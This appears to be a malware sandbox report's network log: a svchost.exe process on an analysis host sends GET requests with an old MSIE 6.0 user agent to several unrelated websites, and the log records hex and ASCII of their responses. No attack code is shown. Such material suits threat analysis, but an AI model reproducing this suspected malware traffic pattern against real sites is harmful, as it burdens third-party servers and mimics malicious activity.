                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC8353INData Raw: 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 35 30 2e 35 2c 32 33 2e 39 31 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 35 30 2e 32 38 2c 31 37 2e 34 33 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38
                                                                                                                                                                                                                                                        Data Ascii: ="cls-9" d="M550.5,23.91a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M550.28,17.43a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC8369INData Raw: 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 65 63 74 69 6f 6e 2d 74 6f 70 2d 70 65 72 66 6f 72 6d 61 6e 63 65 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 73 65 63 74 69 6f 6e 2d 74 69 74 6c 65 2d 77 72 61 70 20 74 6f 70 2d 70 65 72 66 6f 72 6d 61 6e 63 65 2d 74 69 74 6c 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 68 32 20 63 6c 61 73 73 3d 22 73 75 62 73 65 63 74 69 6f 6e 2d 74 69 74 6c 65 22 3e e5 ae 9f e7 b8 be e7 b4 b9 e4 bb 8b 3c 2f 68 32 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 6f 70 2d 70 65
                                                                                                                                                                                                                                                        Data Ascii: > </div> </div> </div> <div class="section-top-performance"> <div class="subsection-title-wrap top-performance-title"> <h2 class="subsection-title"></h2> </div> <div class="top-pe


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                        22192.168.2.360292104.21.52.126443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                        2023-10-09 13:52:09 UTC2868OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                        Host: hyab.se
                                                                                                                                                                                                                                                        2023-10-09 13:52:09 UTC2958INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                        Date: Mon, 09 Oct 2023 13:52:09 GMT
                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                        Content-Length: 5702
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                                                        Cross-Origin-Resource-Policy: same-origin
                                                                                                                                                                                                                                                        Origin-Agent-Cluster: ?1
                                                                                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                                                                                        Referrer-Policy: same-origin
                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                        cf-mitigated: challenge
                                                                                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=EUO3kWtES8d6YZu5UKVticH1r%2FeLNmW8pMGcJr5QKCKBRQgP4K9fu7aLXHtFqO7sllIDT1XgFDxNM2g3hZMXppV8aA%2BKjBP1EnYxK%2FWzBJ5sr4nXKy7lxUZv"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                        CF-RAY: 81371a3dea3cdb56-LAX
                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        2023-10-09 13:52:09 UTC2960INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69
                                                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compati
                                                                                                                                                                                                                                                        2023-10-09 13:52:09 UTC2960INData Raw: 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 68 61 6c 6c 65 6e 67 65 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 33 35 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73
                                                                                                                                                                                                                                                        Data Ascii: ble" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name="viewport" content="width=device-width,initial-scale=1"><link href="/cdn-cgi/styles/challenges.css" rel="stylesheet"><meta http-equiv="refresh" content="35"></head><body clas
                                                                                                                                                                                                                                                        2023-10-09 13:52:09 UTC2961INData Raw: 69 47 48 32 50 5a 62 4f 78 57 62 66 4d 42 64 62 4c 7a 52 32 41 4c 70 41 69 52 31 32 78 69 54 6e 73 2d 55 59 76 5a 45 59 46 64 33 39 4e 37 59 54 57 47 70 77 56 68 62 6e 53 5f 49 57 6a 67 47 61 30 73 51 45 4f 38 70 53 55 36 5a 7a 78 6f 45 77 55 30 53 58 30 5a 2d 55 73 56 68 59 73 47 62 62 47 70 5f 72 74 78 6c 5a 45 43 6e 45 4b 4b 49 6c 4a 30 79 55 32 54 76 7a 32 65 47 77 37 51 46 31 5f 30 67 6e 78 71 64 36 52 70 51 44 76 37 62 62 37 71 32 4f 70 58 63 71 34 66 31 54 66 5f 44 66 68 65 78 59 70 2d 54 72 6d 4c 2d 6f 35 6f 52 66 58 32 68 69 2d 38 76 58 53 36 33 6c 58 66 34 47 63 4d 5a 31 31 4d 6d 4e 75 71 66 4c 50 56 66 5a 6a 54 5a 51 6a 4e 66 39 6c 4d 68 33 78 53 43 75 57 4e 52 45 72 30 71 34 6b 36 34 4c 49 6d 4e 4e 70 74 33 6d 4f 39 2d 47 73 6f 41 42 42 76 44
                                                                                                                                                                                                                                                        Data Ascii: iGH2PZbOxWbfMBdbLzR2ALpAiR12xiTns-UYvZEYFd39N7YTWGpwVhbnS_IWjgGa0sQEO8pSU6ZzxoEwU0SX0Z-UsVhYsGbbGp_rtxlZECnEKKIlJ0yU2Tvz2eGw7QF1_0gnxqd6RpQDv7bb7q2OpXcq4f1Tf_DfhexYp-TrmL-o5oRfX2hi-8vXS63lXf4GcMZ11MmNuqfLPVfZjTZQjNf9lMh3xSCuWNREr0q4k64LImNNpt3mO9-GsoABBvD
                                                                                                                                                                                                                                                        2023-10-09 13:52:09 UTC2962INData Raw: 76 30 65 70 6f 36 66 5a 65 37 39 44 48 66 4d 31 5a 31 58 33 6b 5f 32 38 49 41 70 72 57 4e 53 33 38 38 63 4e 44 67 61 79 79 57 39 46 33 56 49 35 5a 61 54 41 53 7a 43 6c 52 34 6a 4f 42 67 71 5a 2d 6f 35 42 4f 58 43 52 4d 4c 37 63 4b 71 65 45 34 35 35 44 4d 33 5f 78 32 46 34 59 39 62 33 61 54 38 58 46 5a 75 4d 35 31 51 50 6e 77 42 30 32 64 6e 2d 5f 4d 42 4f 5f 39 79 76 77 70 36 5a 30 33 73 79 43 34 6f 2d 47 35 47 2d 63 79 57 41 4d 77 42 34 6f 7a 61 6d 70 51 68 5f 30 66 79 59 74 77 5a 5a 52 37 70 62 72 5f 43 55 79 55 41 73 35 49 70 4d 55 77 58 4e 73 76 62 39 4d 4a 62 32 49 38 73 31 72 71 42 56 34 55 4d 6a 46 4b 62 41 4e 4c 58 57 42 79 30 56 6d 55 77 4a 51 6c 46 5a 4f 4c 42 4c 77 64 61 6f 73 34 75 6e 6f 6a 44 69 48 63 79 64 55 66 6b 4c 64 6f 66 66 76 72 4d 73
                                                                                                                                                                                                                                                        Data Ascii: v0epo6fZe79DHfM1Z1X3k_28IAprWNS388cNDgayyW9F3VI5ZaTASzClR4jOBgqZ-o5BOXCRML7cKqeE455DM3_x2F4Y9b3aT8XFZuM51QPnwB02dn-_MBO_9yvwp6Z03syC4o-G5G-cyWAMwB4ozampQh_0fyYtwZZR7pbr_CUyUAs5IpMUwXNsvb9MJb2I8s1rqBV4UMjFKbANLXWBy0VmUwJQlFZOLBLwdaos4unojDiHcydUfkLdoffvrMs
                                                                                                                                                                                                                                                        2023-10-09 13:52:09 UTC2964INData Raw: 37 6b 58 71 4e 33 4b 4f 77 45 5a 54 57 36 54 4c 74 4b 73 46 51 4c 62 62 39 78 44 78 42 57 33 44 42 4b 69 30 6c 54 6c 2f 75 47 67 32 6e 4c 71 71 59 36 71 51 39 59 69 5a 4b 46 66 69 39 48 79 45 58 54 79 73 70 50 69 44 38 37 44 52 6e 39 78 72 5a 6d 65 6b 35 30 76 71 62 46 37 7a 61 33 67 66 72 76 79 61 61 70 6e 70 75 33 4f 70 74 6d 77 32 4d 59 73 63 66 39 53 68 46 54 2f 65 36 4b 71 4b 76 38 4a 58 6e 44 6d 39 67 4d 47 4b 4e 78 34 45 70 4c 57 63 66 59 50 41 37 36 76 52 44 75 46 47 63 48 75 62 45 79 44 36 45 6d 30 6e 34 43 41 42 34 33 65 42 6e 31 47 39 73 6b 55 6f 6c 32 4b 68 71 65 31 69 52 50 37 4f 66 56 45 2f 4d 2f 65 31 66 38 57 38 62 33 51 47 4c 76 30 31 4d 30 3d 27 2c 74 3a 20 27 4d 54 59 35 4e 6a 67 31 4f 54 55 79 4f 53 34 35 4d 44 51 77 4d 44 41 3d 27 2c
                                                                                                                                                                                                                                                        Data Ascii: 7kXqN3KOwEZTW6TLtKsFQLbb9xDxBW3DBKi0lTl/uGg2nLqqY6qQ9YiZKFfi9HyEXTyspPiD87DRn9xrZmek50vqbF7za3gfrvyaapnpu3Optmw2MYscf9ShFT/e6KqKv8JXnDm9gMGKNx4EpLWcfYPA76vRDuFGcHubEyD6Em0n4CAB43eBn1G9skUol2Khqe1iRP7OfVE/M/e1f8W8b3QGLv01M0=',t: 'MTY5Njg1OTUyOS45MDQwMDA=',
                                                                                                                                                                                                                                                        2023-10-09 13:52:09 UTC2965INData Raw: 65 28 27 68 65 61 64 27 29 5b 30 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 63 70 6f 29 3b 7d 28 29 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                        Data Ascii: e('head')[0].appendChild(cpo);}());</script></body></html>


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                        23192.168.2.360058185.237.66.112443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                        2023-10-09 13:52:09 UTC2951OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                        Host: techtrans.de
                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC3291INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                        Date: Mon, 09 Oct 2023 13:52:10 GMT
                                                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                        Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                        Expires: 0
                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                        Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                        Content-Security-Policy: report-uri https://techtrans.de
                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                        Permissions-Policy: accelerometer=(), autoplay=(), camera=(), fullscreen=*, geolocation=(self), gyroscope=(), microphone=(), payment=*
                                                                                                                                                                                                                                                        Upgrade: h2,h2c
                                                                                                                                                                                                                                                        Connection: Upgrade, close
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET,PUT,POST,DELETE
                                                                                                                                                                                                                                                        Access-Control-Allow-Headers: Content-Type, Authorization
                                                                                                                                                                                                                                                        X-Content-Security-Policy: img-src *; media-src * data:;
                                                                                                                                                                                                                                                        X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC3292INData Raw: 32 63 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 27 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 27 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 27 3e 3c 2f 68 65 61 64 3e 3c 62
                                                                                                                                                                                                                                                        Data Ascii: 2c6<!DOCTYPE HTML PUBLIC '-//IETF//DTD HTML 2.0//EN'><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv='Content-Type' content='text/html; charset=utf-8'></head><b


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                        24192.168.2.35948391.229.22.126443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                        2023-10-09 13:52:09 UTC2958OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                        Host: pleszew.policja.gov.pl
                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC3294INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Mon, 09 Oct 2023 13:52:16 GMT
                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC3294INData Raw: 31 66 63 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 6c 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 20 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 6e 64 65 78 2c 20 46 6f 6c 6c 6f 77 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 50 50 20 50 6c 65
                                                                                                                                                                                                                                                        Data Ascii: 1fc0<!DOCTYPE html><html lang="pl"> <head> <meta charset="UTF-8"/> <meta name="description" content=" "/> <meta name="keywords" content=""/> <meta name="robots" content="Index, Follow"/> <meta name="author" content="KPP Ple
                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC3953INData Raw: 0a 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 21 2d 2d 20 20 74 6f 70 6e 65 77 73 2e 20 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 20 63 6f 6e 74 65 6e 74 20 20 2d 2d 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 20 0d 0a 20 20 3c 21 2d 2d 20 20 63 6f 6e 74 65 6e 74 2d 6c 65 66 74 20 20 2d 2d 3e 0d 0a 20 20 3c 61 72 74 69 63 6c 65 20 69 64 3d 22 77 0d 0a 32 30 30 30 0d 0a 74 78 74 22 20 63 6c 61 73 73 3d 22 6d 61 69 6e 4c 65 66 74 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 21 2d 2d 20 20 61 6b 74 75 61 6c 6e 6f 73 63 69 20 20 2d 2d 3e 0d 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 61 67 6c 6f 77 65 6b 31 22 3e 3c 68 32 3e 41 6b 74 75 61 6c 6e 6f c5 9b 63 69 3c 2f 68 32 3e 0d 0a 20 20 3c 21 2d 2d 20 6f 70 63 6a 65
                                                                                                                                                                                                                                                        Data Ascii: </section></div>... topnews. -->... content --><div id="content"> ... content-left --> <article id="w2000txt" class="mainLeft"> ... aktualnosci --><div class="naglowek1"><h2>Aktualnoci</h2> ... opcje
                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC3969INData Raw: 64 6f 70 61 6c 61 63 7a 65 2e 68 74 6d 6c 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 64 6f 70 61 6c 61 63 7a 65 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 64 6f 6b 75 6d 65 6e 74 79 2f 62 61 74 6f 6e 79 2f 33 39 36 31 2e 6a 70 67 3f 76 3d 31 36 35 37 31 31 32 36 31 38 22 20 61 6c 74 3d 22 64 6f 70 61 6c 61 63 7a 65 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 2f 3e 3c 2f 61 3e 0d 0a 31 30 30 30 0d 0a 3c 2f 64 69 76 3e 0a 09 09 0a 09 0a 09 09 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 74 65 6d 22 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 33 30 30 70 78 3b 20 68 65 69 67 68 74 3a 31 32 37 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 30 70 78 22 3e 3c 61 20 68 72 65 66 3d 22 2f 77
                                                                                                                                                                                                                                                        Data Ascii: dopalacze.html" target="_blank" aria-label="dopalacze"><img src="/dokumenty/batony/3961.jpg?v=1657112618" alt="dopalacze" aria-hidden="true" /></a>1000</div><div class="item" style="width:300px; height:127px;margin-bottom:10px"><a href="/w
                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC3985INData Raw: 7a 20 73 65 72 77 69 73 75 20 4b 50 50 20 50 6c 65 73 7a 65 77 2e 3c 62 72 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 6f 6c 69 63 6a 61 2e 70 6c 2f 70 6f 6c 2f 77 6f 6c 6e 79 74 65 6b 73 74 2f 34 36 36 31 36 2c 64 6f 6b 2e 68 74 6d 6c 22 3e 5a 61 70 6f 7a 6e 61 6a 20 73 69 c4 99 20 7a 20 7a 61 73 61 64 61 6d 69 3c 2f 61 3e 3c 62 72 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 0d 0a 32 62 36 0d 0a 2f 70 6f 6c 69 63 6a 61 2e 70 6c 2f 70 6f 6c 2f 77 6f 6c 6e 79 74 65 6b 73 74 2f 35 39 34 38 35 2c 64 6f 6b 2e 68 74 6d 6c 22 3e 50 6f 6c 69 74 79 6b 61 20 70 72 79 77 61 74 6e 6f c5 9b 63 69 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: z serwisu KPP Pleszew.<br/> <a href="https://policja.pl/pol/wolnytekst/46616,dok.html">Zapoznaj si z zasadami</a><br/> <a href="https:/2b6/policja.pl/pol/wolnytekst/59485,dok.html">Polityka prywatnoci</a>


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                        25192.168.2.36078394.130.146.206443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC3037OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                        Host: diamir.de
                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC3582INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Mon, 09 Oct 2023 13:52:10 GMT
                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                        Content-Length: 162
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Location: https://www.diamir.de/
                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC3582INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                        26192.168.2.361931172.67.164.178443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC3037OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                        Host: clinicasanluis.com.co
                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC3293INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                        Date: Mon, 09 Oct 2023 13:52:10 GMT
                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        location: https://www.clinicasanluis.com.co/
                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        x-turbo-charged-by: LiteSpeed
                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=XJPNAKXgwbxFDwZ6yTQMOflfadpxr2HHNTaaCk6aU9DXYr6It9s9kltils2YX7E%2FkILjs7uLapZKSzxLfoCNpEXXKXhNU%2Bm2EWyEmEwU%2Bd7L6V%2FDOXkKkzsJgNT%2BggVWZrTo3TzETvY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                        Server: cloudflare
